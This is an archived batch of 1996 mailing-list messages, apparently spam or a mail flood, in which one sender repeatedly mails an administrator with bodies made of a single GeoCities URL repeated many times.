m/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/H
eights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.
geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/Sil
iconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Height
s/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geoci
ties.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconV
alley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/260
8www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.c
om/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/
Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zer0.Faith.Inc.@website.chek.it.out
Date: Sat, 14 Dec 1996 22:13:16 -0800 (PST)
To: <Admin@bexcol.demon.co.uk>
Subject: www.geocities.com/SiliconValley/Heights/2608
Message-ID: <199612150215.VAA07650@cps1.starwell.com>
MIME-Version: 1.0
Content-Type: text/plain


www.geocities.com/SiliconValley/Heights/2608
www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.co
m/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/H
eights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.
geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/Sil
iconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Height
s/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geoci
ties.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconV
alley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/260
8www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.c
om/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/
Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zer0.Faith.Inc.@website.chek.it.out
Date: Sat, 14 Dec 1996 22:13:26 -0800 (PST)
To: <Admin@bexcol.demon.co.uk>
Subject: www.geocities.com/SiliconValley/Heights/2608
Message-ID: <199612150215.VAA07653@cps1.starwell.com>
MIME-Version: 1.0
Content-Type: text/plain


www.geocities.com/SiliconValley/Heights/2608
www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.co
m/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/H
eights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.
geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/Sil
iconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Height
s/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geoci
ties.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconV
alley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/260
8www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.c
om/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/
Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zer0.Faith.Inc.@website.chek.it.out
Date: Sat, 14 Dec 1996 22:13:28 -0800 (PST)
To: <Admin@bexcol.demon.co.uk>
Subject: www.geocities.com/SiliconValley/Heights/2608
Message-ID: <199612150215.VAA07656@cps1.starwell.com>
MIME-Version: 1.0
Content-Type: text/plain


www.geocities.com/SiliconValley/Heights/2608
www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.co
m/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/H
eights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.
geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/Sil
iconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Height
s/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geoci
ties.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconV
alley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/260
8www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.c
om/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/
Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zer0.Faith.Inc.@website.chek.it.out
Date: Sat, 14 Dec 1996 22:13:32 -0800 (PST)
To: <Admin@bexcol.demon.co.uk>
Subject: www.geocities.com/SiliconValley/Heights/2608
Message-ID: <199612150215.VAA07659@cps1.starwell.com>
MIME-Version: 1.0
Content-Type: text/plain


www.geocities.com/SiliconValley/Heights/2608
www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.co
m/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/H
eights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.
geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/Sil
iconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Height
s/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geoci
ties.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconV
alley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/260
8www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.c
om/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/
Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zer0.Faith.Inc.@website.chek.it.out
Date: Sat, 14 Dec 1996 22:13:50 -0800 (PST)
To: <Admin@bexcol.demon.co.uk>
Subject: www.geocities.com/SiliconValley/Heights/2608
Message-ID: <199612150215.VAA07662@cps1.starwell.com>
MIME-Version: 1.0
Content-Type: text/plain


www.geocities.com/SiliconValley/Heights/2608
www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.co
m/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/H
eights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.
geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/Sil
iconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Height
s/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geoci
ties.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconV
alley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/260
8www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.c
om/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/
Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zer0.Faith.Inc.@website.chek.it.out
Date: Sat, 14 Dec 1996 22:14:14 -0800 (PST)
To: <Admin@bexcol.demon.co.uk>
Subject: www.geocities.com/SiliconValley/Heights/2608
Message-ID: <199612150215.VAA07666@cps1.starwell.com>
MIME-Version: 1.0
Content-Type: text/plain


www.geocities.com/SiliconValley/Heights/2608
www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.co
m/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/H
eights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.
geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/Sil
iconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Height
s/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geoci
ties.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconV
alley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/260
8www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.c
om/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/
Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zer0.Faith.Inc.@website.chek.it.out
Date: Sat, 14 Dec 1996 22:14:27 -0800 (PST)
To: <Admin@bexcol.demon.co.uk>
Subject: www.geocities.com/SiliconValley/Heights/2608
Message-ID: <199612150216.VAA07669@cps1.starwell.com>
MIME-Version: 1.0
Content-Type: text/plain


www.geocities.com/SiliconValley/Heights/2608
www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.co
m/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/H
eights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.
geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/Sil
iconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Height
s/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geoci
ties.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconV
alley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/260
8www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.c
om/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/
Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zer0.Faith.Inc.@website.chek.it.out
Date: Sat, 14 Dec 1996 22:14:43 -0800 (PST)
To: <Admin@bexcol.demon.co.uk>
Subject: www.geocities.com/SiliconValley/Heights/2608
Message-ID: <199612150216.VAA07672@cps1.starwell.com>
MIME-Version: 1.0
Content-Type: text/plain


www.geocities.com/SiliconValley/Heights/2608
www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.co
m/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/H
eights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.
geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/Sil
iconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Height
s/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geoci
ties.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconV
alley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/260
8www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.c
om/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/
Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zer0.Faith.Inc.@website.chek.it.out
Date: Sat, 14 Dec 1996 22:14:52 -0800 (PST)
To: <Admin@bexcol.demon.co.uk>
Subject: www.geocities.com/SiliconValley/Heights/2608
Message-ID: <199612150216.VAA07675@cps1.starwell.com>
MIME-Version: 1.0
Content-Type: text/plain


www.geocities.com/SiliconValley/Heights/2608
www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.co
m/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/H
eights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.
geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/Sil
iconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Height
s/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geoci
ties.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconV
alley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/260
8www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.c
om/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/
Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zer0.Faith.Inc.@website.chek.it.out
Date: Sat, 14 Dec 1996 22:14:54 -0800 (PST)
To: <Admin@bexcol.demon.co.uk>
Subject: www.geocities.com/SiliconValley/Heights/2608
Message-ID: <199612150216.VAA07678@cps1.starwell.com>
MIME-Version: 1.0
Content-Type: text/plain


www.geocities.com/SiliconValley/Heights/2608
www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.co
m/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/H
eights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.
geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/Sil
iconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Height
s/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geoci
ties.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconV
alley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/260
8www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.c
om/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/
Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zer0.Faith.Inc.@website.chek.it.out
Date: Sat, 14 Dec 1996 22:15:09 -0800 (PST)
To: <Admin@bexcol.demon.co.uk>
Subject: www.geocities.com/SiliconValley/Heights/2608
Message-ID: <199612150216.VAA07681@cps1.starwell.com>
MIME-Version: 1.0
Content-Type: text/plain


www.geocities.com/SiliconValley/Heights/2608
www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.co
m/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/H
eights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.
geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/Sil
iconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Height
s/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geoci
ties.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconV
alley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/260
8www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.c
om/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/
Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zer0.Faith.Inc.@website.chek.it.out
Date: Sat, 14 Dec 1996 22:15:18 -0800 (PST)
To: <Admin@bexcol.demon.co.uk>
Subject: www.geocities.com/SiliconValley/Heights/2608
Message-ID: <199612150217.VAA07684@cps1.starwell.com>
MIME-Version: 1.0
Content-Type: text/plain


www.geocities.com/SiliconValley/Heights/2608
www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.co
m/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/H
eights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.
geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/Sil
iconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Height
s/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geoci
ties.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconV
alley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/260
8www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.c
om/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/
Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zer0.Faith.Inc.@website.chek.it.out
Date: Sat, 14 Dec 1996 22:15:36 -0800 (PST)
To: <Admin@bexcol.demon.co.uk>
Subject: www.geocities.com/SiliconValley/Heights/2608
Message-ID: <199612150217.VAA07688@cps1.starwell.com>
MIME-Version: 1.0
Content-Type: text/plain


www.geocities.com/SiliconValley/Heights/2608
www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.co
m/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/H
eights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.
geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/Sil
iconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Height
s/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geoci
ties.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconV
alley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/260
8www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.c
om/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/
Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zer0.Faith.Inc.@website.chek.it.out
Date: Sat, 14 Dec 1996 22:15:42 -0800 (PST)
To: <Admin@bexcol.demon.co.uk>
Subject: www.geocities.com/SiliconValley/Heights/2608
Message-ID: <199612150217.VAA07692@cps1.starwell.com>
MIME-Version: 1.0
Content-Type: text/plain


www.geocities.com/SiliconValley/Heights/2608
www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.co
m/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/H
eights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.
geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/Sil
iconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Height
s/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geoci
ties.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconV
alley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/260
8www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.c
om/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/
Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zer0.Faith.Inc.@website.chek.it.out
Date: Sat, 14 Dec 1996 22:15:48 -0800 (PST)
To: <Admin@bexcol.demon.co.uk>
Subject: www.geocities.com/SiliconValley/Heights/2608
Message-ID: <199612150217.VAA07699@cps1.starwell.com>
MIME-Version: 1.0
Content-Type: text/plain


www.geocities.com/SiliconValley/Heights/2608
www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.co
m/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/H
eights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.
geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/Sil
iconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Height
s/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geoci
ties.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconV
alley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/260
8www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.c
om/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/
Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zer0.Faith.Inc.@website.chek.it.out
Date: Sat, 14 Dec 1996 22:15:52 -0800 (PST)
To: <Admin@bexcol.demon.co.uk>
Subject: www.geocities.com/SiliconValley/Heights/2608
Message-ID: <199612150217.VAA07702@cps1.starwell.com>
MIME-Version: 1.0
Content-Type: text/plain


www.geocities.com/SiliconValley/Heights/2608
www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.co
m/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/H
eights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.
geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/Sil
iconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Height
s/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geoci
ties.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconV
alley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/260
8www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.c
om/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/
Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zer0.Faith.Inc.@website.chek.it.out
Date: Sat, 14 Dec 1996 22:15:55 -0800 (PST)
To: <Admin@bexcol.demon.co.uk>
Subject: www.geocities.com/SiliconValley/Heights/2608
Message-ID: <199612150217.VAA07705@cps1.starwell.com>
MIME-Version: 1.0
Content-Type: text/plain


www.geocities.com/SiliconValley/Heights/2608
www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.co
m/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/H
eights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.
geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/Sil
iconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Height
s/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geoci
ties.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconV
alley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/260
8www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.c
om/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/
Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zer0.Faith.Inc.@website.chek.it.out
Date: Sat, 14 Dec 1996 22:15:57 -0800 (PST)
To: <Admin@bexcol.demon.co.uk>
Subject: www.geocities.com/SiliconValley/Heights/2608
Message-ID: <199612150217.VAA07708@cps1.starwell.com>
MIME-Version: 1.0
Content-Type: text/plain


www.geocities.com/SiliconValley/Heights/2608
www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.co
m/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/H
eights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.
geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/Sil
iconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Height
s/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geoci
ties.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconV
alley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/260
8www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.c
om/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/
Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zer0.Faith.Inc.@website.chek.it.out
Date: Sat, 14 Dec 1996 22:16:23 -0800 (PST)
To: <Admin@bexcol.demon.co.uk>
Subject: www.geocities.com/SiliconValley/Heights/2608
Message-ID: <199612150217.VAA07711@cps1.starwell.com>
MIME-Version: 1.0
Content-Type: text/plain


www.geocities.com/SiliconValley/Heights/2608
www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.co
m/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/H
eights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.
geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/Sil
iconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Height
